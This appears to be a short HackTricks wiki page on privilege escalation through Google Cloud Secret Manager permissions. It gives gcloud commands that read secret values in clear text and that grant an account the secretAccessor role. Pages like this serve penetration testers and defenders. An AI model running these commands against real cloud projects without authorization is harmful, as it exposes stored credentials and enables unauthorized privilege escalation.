GCP - Secretmanager Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

secretmanager

For more information about secretmanager:

pageGCP - Secrets Manager Enum

secretmanager.versions.access

This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):

# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"

As this is also a post exploitation technique it can be found in:

pageGCP - Secretmanager Post Exploitation

secretmanager.secrets.setIamPolicy

This give you access to give you access to read the secrets from the secret manager, like using:

gcloud secrets add-iam-policy-binding <scret-name> \
  --member="serviceAccount:<sa-name>@$PROJECT_ID.iam.gserviceaccount.com" \
  --role="roles/secretmanager.secretAccessor"
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Last updated